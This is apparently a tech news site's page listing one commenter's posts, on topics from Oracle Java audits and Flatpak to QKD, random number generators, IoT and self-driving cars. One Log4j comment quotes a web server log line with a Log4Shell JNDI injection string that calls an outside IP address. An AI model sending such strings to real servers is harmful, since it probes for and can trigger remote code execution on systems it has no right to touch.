Re: Attempting to Outsource Potential Legal Liabilites
And in the case of a fully self driving car clocked by a speed camera doing 40 in a 20 zone... Who or what gets the points?
Posts by Paul Uszak
76 publicly visible posts • joined 20 Jan 2009
Tesla to license Full Self-Driving stack to other automakers, says Musk
Let's have a chat about Java licensing, says unsolicited Oracle email
Wednesday 5th July 2023 12:07 GMT
Audit? We don't want no audit.
What's this about Oracle "auditing" companies? By the Oracle police? We use Java where and how we want. If you want to "audit" us, I suggest bringing a court order, armed police or destroyer droid. Otherwise you risk annoying James on the front desk (ex. Royal Marine sergeant). But doesn't work Tuesdays... damn...
Florida man insists he didn't violate the law by keeping Top Secret docs
Thursday 15th June 2023 01:33 GMT
Re: Incredibly dangerous/stupid.
But that's my point. Walt will have so much dirt on Trump. There's probably other 'stuff' that hasn't attracted the FBI's attention yet. If Walt starts thinking that there is no love for him from Trump (or at least his team), he might think that he has to look after himself too. It is so in Trump's interest to keep Walt sweet as he can burn him. The FBI would drop charges against Walt in a second if they could get a President.
UK seeks light-touch AI legislation as industry leaders call for LLM pause
Anyone want an International Space Station? Slightly used
By order of Canonical: Official Ubuntu flavors must stop including Flatpak by default
Sunday 26th February 2023 13:46 GMT 
Thanks goodness!
My experience of all of these 'all-dependencies' installation systems (appimage/flatpak/snap) is that they don't work. Examples:-
Most can't see /tmp so you end up putting temporary files all over the place, making your machine look like a Windows one.
Some can't see the network. Just where do you put your files?
Some can't see printers. Like Inkscape (which I kinda understand as it's an icon generator, but).
Appimaged Audacity can't even produce sound! I wonder how that was tested?
Only apt seems to work properly with full access to resources. Unfortunately politics means that many applications are no longer available in that form. Why does Linux desktop have to be so difficult? Because it's free.
Conversational AI tells us what we want to hear – a fib that the Web is reliable and friendly
Thursday 9th February 2023 13:39 GMT 
I'm not worried.
I too have a stash of toilet paper and Tuna fish (one can be bartered for the other). But, ChatGPT/Bard/AI are scary at the moment as they're free running (as in their owners can do what they want.) But wait till an 'event' occurs. Three examples:-
1. The AI comes up with a totally new 'challenge' that directly leads to the death of a child.
2. The AI produces lyrics that are extremely similar to something Taylor Swift wrote.
3. The AI allows some punter to get 10 straight wins on the horses.
Then the AI systems will be the scared ones storing e-toilet paper as regulation falls from the sky...
India sets USB-C charging deadline for smartphones
Wednesday 4th January 2023 13:06 GMT
Re: So much for "Brexit freedoms" eh ?
If Duxit and Bexit are true, then that's bad news for England.
The EU president publicly stated that at all costs, it must be the case that being outside the EU is worse than being inside. That could mean them hardening their attitude to England, further increasing our transaction costs and no prospect of resolving the Northern Ireland Protocol to disincentivise the Dutch and Belgians.
But then, that's exactly Westminster's attitude to Scottish independence. So ho hum...
Open source 'Office' options keep Microsoft running faster than ever
Wednesday 15th June 2022 14:48 GMT
"I have never seen a company using an opensource office tool"
That's right. There aren't any unless they're mom and daughter sandwich shops. Imagine appealing a High Court ruling with LibreOffice. Imagine tendering for a new hospital build with LibreOffice. Imagine sending a piece to Vogue with LibreOffice. No, no, no.
The reason no one uses LibreOffice is that no one of stature uses LibreOffice. Why else do we teach our school children to use MS products?
EU makes USB-C common charging port for most electronic devices
Wednesday 8th June 2022 12:57 GMT 
Apple will still sell proprietary chargers anyway and make more money still.
What's really in the Radio Equipment Directive? Has anyone checked the detail? The rules now say there must be a USB-C port on those relevant devices.
So what? That doesn't affect chargers. USB-C is a data cable as well as a power cable. Apple will make smarter chargers that talk to the OS/firmware of the device and acknowledge each other. Probably with some cryptographic signature. Common 3rd party chargers will not be able to replicate the handshake, so Apple products will only charge with Apple signed chargers. Then forcing you to buy either genuine Apple, or Apple licensed chargers. And due to all of the additional complexity thrust upon them by the Socialist EU bureaucracy, Apple unfortunately have to charge more for them. Remember that it's for your safety which is Apple's number one priority.
Shame on you EU. I had an old Dell 19V charger with a really common jack plug. Yet it talked over the DC wires with the laptop's firmware so no 3rd party charger would work. That was probably for my safety too. And it's why I no longer buy Dell anything. Also think John Deer tractors.
New York to get first right-to-repair law for electronics
Sunday 5th June 2022 07:57 GMT
We don't want that here.
Why the hell are we talking about the US on this English website? Non of this applies here, and the English are too stupid to allow it. Safety comes first and foremost. Don't forget that the CGI Lurpak man on a skateboard wore a helmet in case he fell and got hurt. I'm honestly ashamed.
A précis is: How can I change my oil filter on my 2022 Mazda 6? How do I change my HV light bulbs without being killed? I can't because the service manual is secret. Get that done Boris, or would you rather have your flat re-redecorated courtesy of Ford?
Canonical puts out last update to Ubuntu 20.04 before 22.04
Saturday 26th February 2022 14:32 GMT
Re: Compare cars and computers
Lucky you.
My car's SatNav needs a major update - it's constantly in the Grand Canal in Venice (£150), the screen wash is gone, oil & filter needs changing and the engine flushing. It never fully recovered from me accidentally putting diesel into the petrol tank. Sump plug leaks. Plus the tyres are half flat as they've perished. Wipers are split and the driver's side mirror is taped on. It has no 2nd gear.
God how I wish I could just go online and update the damn car...
P.S. Before anyone says it, I don't mean via webuyanycar.com. I'm attached to Henry.
Something 4,000 light years away emitted strange radio bursts. This is where we talk to scientists for actual info
OpenShell has been working on a classic replacement for Windows 11's Start menu
Thursday 27th January 2022 14:05 GMT
Yet what about Windows 12 & 13's breakages?
I've read that the advanced dev /marketing teams are looking towards Windows 13 after just finalising the bulk of 12's appearance. Wired have MS poaching several of the Apple graphics artists. I guess MS have to do that to compete with iOS 16's release. What's all that going to break?
Unless 13 is considered unlucky, and they go with Win'26.
The James Webb Space Telescope has only gone and deployed its primary mirror
Friday 14th January 2022 14:07 GMT
"A camera would be nothing be(sic) PR."
A. Does anyone remember the oxygen consumption of Apollo 14? What is the current main data transmission rate of Voyager 1? Can anyone imagine the shape of dust storms on Mars?
B. Does anyone remember Neil Armstrong climbing down the ladder onto the Moon? Have you ever witnessed a total solar eclipse? Have you ever witnessed a launch of the space shuttle?
Which excites you the most, A or B? PR is everything. Unfortunately scientists and engineers don’t really understand that. Science does not speak for itself. If the JWST didn’t have cameras, then put them on. Figure it out; it’s NASA. Hire an advertising firm. They did it for Apollo 11 which also didn’t need the additional complexity.
And this is what Musk, Bezos and Branson understand. This is why the Millau Viaduct is widely known as having been built by Norman Foster. This is why was Trump, and why he could serve another two terms.
I respectfully yet forcefully suggest that all science and engineering courses should include marketing components. Otherwise we’re all going to end up like Nebraska.
Secure boot for UK electric car chargers isn't mandatory until 2023 – but why the delay?
Log4j RCE latest: In case you hadn't noticed, this is Really Very Bad, exploited in the wild, needs urgent patching
Tuesday 14th December 2021 13:01 GMT
I suggest that this is a manifestation of the open source movement, and I'm being nice (honest). It would take a lot to persuade a commercial vendor to include all this (unnecessary) stuff into a retail library. Time is money and there's probably little user demand for JNDI/RMI/LDAP features in logging.
But all commercial/managerial sense goes out of the window for most open source stuff. If you're doing it as an unpaid hobby, they why not? It's fun. Some might even consider it art. Anything goes if there's no market strategy (and there's no market). New features creep in unchecked as young developers 'play' with the latest cool thing, irrespective of whether there's any demand for them. Therein lies the RMI and the problem...
Tuesday 14th December 2021 01:57 GMT 
This is all very complicated and I don't understand it. A logging library needs JNDI, RMI and LDAP functionality? Beyond PRINT (message)? Maybe it's a joke. Very fortunately, I use JULI Commons and I've just found:-
GET /$%7Bjndi:dns://45.83.64.1/securityscan-http80%7D HTTP/1.1" 404 878 "${jndi:dns://45.83.64.1/securityscan-http80}
in my web server log file....
How to destroy expensive test kit: What does that button do?
ESA's Mars Express picks up plaintive bleeps of China's Zhurong rover, adding much-needed comms redundancy
Another brick in the (kitchen) wall: Users report frozen 1st generation Google Home Hubs
Tuesday 16th November 2021 20:08 GMT
Re: Why is Google not liable for damages?
With respect, bollocks.
Go on and try. Go to Curry's and try to take back your three year old TV that's now been bricked. Explain your consumer rights. Draw a diagram. Cause a scene. The Saturday girl will press the panic alarm, the police will be called. Then you might be tasered because that's the most convenient thing to do before lunch break. The police might use chemical weapons on you too. There were 492,000 recorded incidents where a police officer reported the use of force on an individual in England and Wales in the year to March. Argos is probably the same.
If it bricks, count yourself lucky that it was the device and not you. I'm referencing Jordan Walker-Brown who'll never walk again. Now about that TV...
Tuesday 16th November 2021 13:28 GMT
Why is Google not liable for damages?
Isn't it time that legislation was passed to recover damages from the up-daters?
If you take your car to the garage for an MOT and it falls off the ramp and is damaged, the garage is liable. Same with services delivered to patients at a hospital. Surely Google/IT provider should be liable for damages too. Either fix the code, or if totally bricked replace it. This would force companies to test upgrades rather than have the end users do so.
I understand that software is a little different to hardware, but is it actually? Is it only different in the consumers' minds because they want us to think that way? Now extrapolate and go forward in time. I foresee all products having embedded software and network connectivity. What if all my beer cans get bricked due to a wonky ASDA.OS up-date and I can't remotely open them? I'd want pre-cooled replacements.
Perhaps the consumer needs a paradigm shift.
Product release cycles are killing the environment, techies tell British Computer Society
Think your phone is snooping on you? Hold my beer, says basic physics
It had to happen: Microsoft's cloudy Windows 365 desktops are due to land next month
Thursday 15th July 2021 12:10 GMT
Re: So now
You've misunderstood the Book:-
A "new heaven" and "new earth" (Azure) replace the old heaven and old earth. There is no more suffering or death. (21:1–8) (no more need for patching).
God comes to dwell with humanity in the New Jerusalem. (21:2–8) (Bill walks amongst us/the poor, not in armoured helicopter).
Description of the New Jerusalem. (21:9–27) (Microsoft campus on Mars).
The River of Life and the Tree of Life appear for the healing of the nations and peoples. The curse of sin is ended. (22:1–5) (Linux is defeated and we are shown the way of the Cloud).
And in Conclusion:-
Bill's reassurance that Windows 12's coming is imminent. Final admonitions. (22:6–21)
Tim Cook: Sideloading is a disaster and proposed App Store reforms would harm user privacy and security
Kaspersky Password Manager's random password generator was about as random as your wall clock
Thursday 8th July 2021 17:09 GMT
Re: CRACK MY 8 CHARACTER PASSWORD
Oh dear. Rolling your own crypto :-(
Please read https://crypto.stackexchange.com/questions/43272/why-is-writing-your-own-encryption-discouraged .
Plus 6.1E15 is nothing. Sorry. Stick to the tried stuff, or try to use one time pads if security is of such concern. But for that you'll need access to a trusted TRNG. Which you'll have to build yourself. 100% un-breakability comes at a price.
Thursday 8th July 2021 13:58 GMT
Re: If you value your security get a hardware random number generator -- or two
ERNIE: It wasn't a differencing operation. It was simply amplifying the electrical noise on a QS92 regulating valve (http://www.r-type.org/exhib/aag0022.htm). That then gated a counter and the numbers popped out using:- https://i.stack.imgur.com/cHpf9.png.
TrueRND: I too have one :-( Not really happy with it. But please remember on what article we are commenting on/getting excited. There is a concept called computational indistinguishability. That means you cannot differentiate a pseudo random sequence from a truly random sequence, no matter how hard you try. It's just the maths/statistics. That applies to TrueRND too. That's why the only solution that provides 100% confidence is a self build.
But most don't care, so ignore my ranting and I've got the lawn to mow...
Thursday 8th July 2021 12:47 GMT
Re: If you value your security get a hardware random number generator -- or two
Actually NIST doesn't. Not for crypto. That's a common fallacy. It's in the front matter, quoting from NIST 800-90b:-
"This publication has been developed by NIST in accordance with its statutory responsibilities under the [Federal Information Security Modernization Act (FISMA) of 2014, 44 U.S.C. § 3551 et seq.](https://www.congress.gov/113/plaws/publ283/PLAW-113publ283.pdf), Public Law (P.L.) 113-283. NIST is responsible for developing information security standards and guidelines, including minimum requirements for federal information systems, but such standards and guidelines shall not apply to national security systems without the express approval of appropriate federal officials exercising policy authority over such systems. "
Which says:-
"§ 3553. Authority and functions of the Director and the Secretary:-
‘‘(d) NATIONAL SECURITY SYSTEMS.—Except for the authorities and functions described in subsection (a)(5) and subsection (c), the authorities and functions of the Director and the Secretary under this section shall not apply to national security systems.
‘‘(e) DEPARTMENT OF DEFENSE AND INTELLIGENCE COMMUNITY SYSTEMS.—(1) The authorities of the Director described in para-graphs (1) and (2) of subsection (a) shall be delegated to the Sec-retary of Defense in the case of systems described in paragraph (2) and to the Director of National Intelligence in the case of systems described in paragraph (3). "
So, good enough for the people, but not (US) national security?
Quantum Key Distribution: Is it as secure as claimed and what can it offer the enterprise?
Thursday 8th July 2021 00:25 GMT
Re: So the whole point is?
Well I think that you'd have to be in the presence of the fibres. Perhaps you could tie a really tight knot that would choke off the internet. The keys wouldn't be able to get through if the knot radius was less than the diameter of standard cryptographic photons. Or use plumbers' freezing spray to really slow them down.
Wednesday 7th July 2021 23:19 GMT
Re: So the whole point is?
Err, no. The system is quantum as it deals with the generation, transmission and measurement of photon polarizations. The point is (quoting from the BB84 paper, https://arxiv.org/pdf/2003.06557.pdf):-
"...when information is encoded in non-orthogonal quantum states, such as single photons with polarization directions 0, 45, 90, and 135 degrees, one obtains a communications channel whose transmissions in principle cannot be read or copied reliably by an eavesdropper ignorant of certain key information used in forming the transmission. The eavesdropper cannot even gain partial information about such a transmission without altering it a random and uncontrollable way likely to be detected by the channel's legitimate users. "
So I can send you 'stuff' with 100% confidence that no one has read it.
Wednesday 7th July 2021 12:48 GMT
Re: Abe Lincoln knew the truth about QKD.
Please don't conflate a self-serving political system and the industrial-military complex with a cryptographic protocol. The article was about the protocol. This is why these threads go off the rails.
If you have insight into how QKD is cryptographically flawed that the organisations I listed don't, please put up. Mathematical detail would be a bonus :-)
Wednesday 7th July 2021 11:50 GMT
Re: my "QKD for managers"
Oh dear. You've gotten the concept upside down. Interception is irrelevant. The beauty of QKD is that it is ALL about identity. The identity management comes from the Observer Effect of quantum physics. Any photon that is observed changes state. That's fundamental to the Universe, and exempt from any hardware resource considerations.
A "true MITM" relay would introduce measurable bases errors at the rate of an additional 50%. When Alice and Bob compare their expected results, the attack is detected. That is QKD's raison d'etre. The original BB84 article is here: https://arxiv.org/pdf/2003.06557.pdf
And that's why everyone is getting QKDNs.
Tuesday 6th July 2021 13:29 GMT
Abe Lincoln knew the truth about QKD.
He's attributed to have said "You can fool all the people some of the time and some of the people all the time, but you cannot fool all the people all the time."
But that's exactly what quantum deniers (QD) are espousing. Any relation to QA? The banks, the governments (https://spacenews.com/governments-ally-for-federated-quantum-encryption-satellite-network/), the universities, the militaries, Europe (https://spacenews.com/europe-picks-euroqci-satellite-quantum-communications-consortium/) are all going for QKDNs because they're secure when correctly implemented. They allow mathematically unbreakable one time pads to be distributed and used.
But of course they're all fools. We here know the truth, eh?
Tuesday 6th July 2021 13:15 GMT
Re: my "QKD for managers"
And perhaps a more balanced answer: https://crypto.stackexchange.com/a/51364/23115.
Reiterating: The fundamental point is that you need to keep implementation distinct from protocol. AES-GCM is also pretty weak if the key is on a Post-it stuck to the monitor. As is RSA/DH if the random number generator is weak/subverted. Everyone should just calm down.
Mine's the one time pad over there...
23. 712. 3. 608. 45. 89. 11. 332. 841. 255. You want more? Cloudflare and pals are streaming 'em live from new RNG API
Wednesday 19th June 2019 02:55 GMT
/dev/random ?
For those lucky enough to use Linux, there's always /dev/random for information theoretic secure random numbers. That will get you 10's of kbits/hr simply using your machine, and 20's of kbits/hr using PornHub. And there's /dev/urandom for infinite amounts of cryptographically secure numbers. We need education, not a lava lamp service...
It's nearly 2019, and your network can get pwned through an oscilloscope
Monday 3rd December 2018 03:10 GMT 
The Rigol 1054 is one of the most popular scopes in the DIY space. It's brilliant for the price of ~£370. And it's wide open at the back too. No authentication at all, helped along with automatic DHCP so all one need do is to shove a network cable up it's ass and it's on line.
You get full remote control of the scope, as well as total access to the sampling data. So you can read the wave forms from my little circuits. Great! The real issue is that this is a powered and networked computer with no sign on whatsoever. It may already be the case that it can be made to execute code remotely, due to some bug in the LXI command interface. What if you then can load malware onto it via Ethernet? Could you simply brick it for a bit of fun, or use it as a clandestine staging post for further exploits? Stuxnet-LXI perchance?
My nightmare is that my oscilloscope might be taken over and connect with my on-line wine chiller...
RIP... almost: Brit high street gadget shack Maplin Electronics
Wednesday 28th February 2018 23:21 GMT
Why are you all dissing Maplins?
I don't understand what everyone's on about. They're an excellent shop. Look, you can buy a drill - https://www.maplin.co.uk/p/maplin-18v-lithium-ion-cordless-drill-n29lk. Just where else could you get one of these fine electronic devices (with built in batteries)? Not Toys'R'Us eh? And it's in stock at my local store. Save me a trip to Argos that will...
SK Telecom makes light of random numbers for IoT applications
Why don't people secure their IoT gadgets? 'It's not my problem'
Thursday 22nd December 2016 19:35 GMT
So In summary...
... it it better? Considering all the problems of connected devices, and all the advantages, are we better off? Consider this in the wider context. It provides jobs and entertainment. Some smart stuff is actually life saving / life enhancing for the disabled. And it helps the terrorists. Some smart stuff also kills terrorists. So...
[Personally, I don't think that we are holistically better off with the IoT but I'm getting old and grumpy.]
Google's driverless car: It'll just block our roads. It's the worst
Monday 2nd June 2014 02:49 GMT
The courts will decide
Google and technology will not decide the viability of driver less vehicles. The courts will. What happens when the first child jumping out into the road is killed? Cue the lawyers. It will go to trial and the courts will have to decide who the defendant(s) are. It's likely that they will just ban that type of vehicle as surely as Segways are banned in Europe.
BMW tried a similar "advancement" when they brought out that weird motorbike with a fully surround roll cage. The idea that you wear a safety harness and have a roll cage might mean that you don't have to wear a safety helmet, thus making a motorbike more appealing. Unfortunately, the law says that on all two wheeled vehicles the driver has to wear a helmet. The project was cancelled.
Biting the hand that feeds IT
